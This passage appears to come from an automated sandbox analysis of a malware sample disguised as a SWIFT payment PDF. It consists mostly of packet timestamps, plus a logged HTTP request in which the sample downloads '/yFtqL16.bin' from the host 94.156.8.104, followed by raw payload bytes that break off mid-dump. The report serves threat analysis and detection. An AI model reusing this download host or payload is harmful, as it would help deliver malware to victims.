                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377245903 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377377987 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377389908 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377402067 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377418041 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377518892 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377593040 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377650023 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377660990 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377671957 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377682924 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377698898 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377710104 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377749920 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377757072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377762079 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377773046 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377784014 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377804995 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377856970 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377867937 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377907991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377918959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377927065 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.377929926 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377940893 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.377962112 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378020048 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378031015 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378041983 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378052950 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378091097 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378096104 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378221035 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378266096 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378272057 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378283024 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378293991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378304958 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378341913 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378396988 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378468037 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378540039 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378552914 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378563881 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378606081 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378720999 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378774881 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378776073 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378786087 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378797054 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378808022 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378818989 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378879070 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378890038 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378901005 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378911972 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378947020 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.378966093 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379021883 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379116058 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379127026 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379244089 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379255056 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379285097 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379285097 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379295111 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379306078 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379317045 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379328012 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379348993 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379403114 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379414082 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379425049 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379436016 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379446983 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379456997 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379457951 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379498959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379511118 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379616022 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379626989 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379641056 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379755974 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379767895 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379795074 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379892111 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379904032 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.379965067 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.379966021 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380136013 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380136013 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380255938 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380268097 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380342007 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380466938 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380475044 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380594015 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380645990 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380645990 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380645990 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380657911 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380765915 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.380815983 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380815983 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380815983 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380815983 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.380966902 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381021023 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381108046 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381155014 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381155014 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381155014 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381258011 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381268978 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381279945 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381290913 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381302118 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381313086 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381324053 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381325006 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381356001 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381464958 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381495953 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381495953 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381495953 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381495953 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381495953 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381527901 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381540060 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.381834984 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.381834984 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.616591930 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616621971 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616645098 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616681099 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616703033 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616858006 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616885900 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.616914034 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.616914034 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617069960 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617079973 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617095947 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617117882 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617140055 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617254972 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617275953 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617304087 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617324114 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617345095 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617403030 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617428064 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617463112 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617599964 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617687941 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617743015 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617764950 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617763996 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617785931 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617805958 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617825985 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617846012 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617885113 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617908955 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617933035 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.617938042 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617938042 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.617957115 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618052959 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618077993 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618100882 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618124008 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618123055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618149996 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618174076 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618197918 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618221045 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618243933 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618268013 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618288994 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618290901 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618314981 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618338108 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618361950 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618385077 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618407965 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618421078 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618421078 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618421078 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618421078 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618421078 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618432045 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618478060 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618500948 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618525028 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618634939 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618635893 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618635893 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618635893 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618635893 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618635893 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618755102 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618779898 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618799925 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618803978 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618828058 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618850946 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618875027 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618897915 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.618973970 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618973970 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.618988991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619014025 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619038105 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619061947 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619116068 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619116068 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619116068 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619116068 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619229078 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619260073 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619285107 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619286060 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619286060 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619286060 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619286060 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619308949 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619333029 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619357109 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619379997 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619405031 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619429111 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619452953 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619457006 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619457006 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619457006 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619457006 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619476080 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619501114 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619524956 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619582891 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619607925 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.619628906 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619630098 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619630098 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619630098 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619630098 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619630098 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619796991 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.619973898 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.623322010 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.623394966 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:22.623516083 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:22.623678923 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:27.375230074 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:27.375511885 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:57.370256901 CEST805034194.156.8.104192.168.11.20

                                    HTTP Request Dependency Graph

                                    • 94.156.8.104

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.11.205034194.156.8.104801268C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Apr 26, 2024 13:39:21.111854076 CEST168OUTGET /yFtqL16.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: 94.156.8.104
                                    Cache-Control: no-cache
                                    Apr 26, 2024 13:39:21.364439964 CEST1289INHTTP/1.1 200 OK
                                    Date: Fri, 26 Apr 2024 11:39:21 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Last-Modified: Thu, 25 Apr 2024 23:00:20 GMT
                                    ETag: "78c40-616f3c0562900"
                                    Accept-Ranges: bytes
                                    Content-Length: 494656
                                    Content-Type: application/octet-stream
                                    Data Raw: 74 aa b7 e9 3c fc 69 b3 b9 49 f4 02 63 47 3a be fb 93 8f fd f4 7d 54 c2 d7 0f 65 1c fd 66 f0 97 15 f3 7e ad 95 2b 7d 0a 98 24 1b 4f cc 83 f0 ae ec 5a 2e 2e 82 2d c7 5a 7a 17 52 3f fe c8 06 fa ed a3 fa 6c 0a c3 86 ae eb 4f 47 69 0d 3f bb 11 e0 6b c8 f4 bd 97 0f 48 e4 c2 4f a9 65 2f 2f 16 38 a5 eb 41 23 2f 7c 8b cd 3b 3c 8c ab f1 63 0b 09 af 65 18 01 22 94 1d 78 3f 73 52 9b 99 7c 33 49 83 c5 69 67 46 09 30 c8 ac 02 83 8a 38 4c 56 af 8e 17 cd 1f 73 f1 a2 8c 89 fc 21 d4 91 04 15 c4 2b ff 21 c9 c0 8b fa 59 eb d5 ad 39 a9 ea fa 66 dc 91 e7 38 6e 92 db d7 fd 64 0a c2 ec e7 c0 e6 bc 74 6f c3 56 d7 ad 74 5a 29 f7 06 07 8d 10 3a 50 7f fc e3 57 d8 da 1e e3 52 92 fb 74 b9 e6 91 e9 bb a3 50 18 64 ff 6b 12 1b 70 67 0e 37 4b 3b ed 96 fb ae 9c 34 08 fd 7e a0 bc bb 46 79 bb 98 b7 9c 64 1a 40 71 17 1a 98 a2 59 04 c7 69 fd 05 3e 86 a8 c7 c9 17 c1 f7 56 18 99 86 49 19 76 a6 a5 85 70 e5 d7 58 de 64 19 a9 8a 6e ac c7 1e 36 73 54 a8 65 48 c9 56 19 bf c7 ae 76 bf 21 87 d9 f6 02 1d 0a 7a 8b 47 eb f9 d9 65 35 b2 94 f2 51 a2 18 8a 9b 29 31 92 7c fd 82 70 44 dd a6 3c 1b f2 b6 be 97 11 83 d9 8b 44 7b 16 a9 d5 75 f7 60 cf 25 b6 d1 f6 9d 4b 64 f0 eb 14 9f d4 c5 d8 5a d6 5b cf df 79 f1 be 21 6b 41 9b 6d d3 7b 57 32 9b c9 ba d9 b2 32 6e 41 09 89 97 01 ea 50 b7 78 31 d7 54 92 5c 31 49 02 d1 43 f7 75 ff 60 aa 6a a6 cf 98 f2 29 44 02 2d b1 0b 11 fb 99 82 55 67 79 0b 8a 3f a3 f7 62 57 e6 03 3c 0f 6f 39 b8 5a 22 f4 a4 8f eb 63 1b b5 22 95 81 a5 0b 49 81 d2 f0 4e 7c f9 da 34 cb f9 13 db b3 ca 3c 2c 88 54 2a 3b b7 d8 05 81 73 5f 14 3a 17 af 5b 14 8c cd b9 c8 bf 23 f9 30 6d f0 bd 44 8c 03 00 1d 83 2a 4c 27 e5 0a 32 fa 5a 4b 17 b0 32 e1 c2 26 8e ce 53 29 5e e2 f0 2f 21 f0 cf eb 8e 61 01 36 9f 6f 66 6a 0b bd 5d e9 2d 14 d1 e2 2b ae 41 45 0d 19 eb 26 2d 52 9c 2b bf 76 02 65 4b 5c 5e 4b 86 a3 ad 9a dd 68 3c 43 ff 8b c3 22 09 23 f3 31 c9 a9 44 cc 9b 06 c1 1a 34 79 53 82 f2 e0 d8 86 2c 3b 77 6e dc 1c 14 70 90 9f c8 f6 b4 a0 26 f5 ba d1 9b f8 aa 41 b2 4a b5 e8 b8 4d 7d f1 f9 49 78 e0 c7 97 a2 6f 93 c1 53 bb cd 03 27 69 27 05 d3 eb 4f b8 c2 52 62 6b 3d aa 1e 45 2a 88 59 b3 8e 72 d4 08 99 4b 9e 08 65 7b d0 4c 4c c4 79 81 f4 0b bb 9e 72 94 59 55 e1 10 d4 3d 97 d8 99 4a 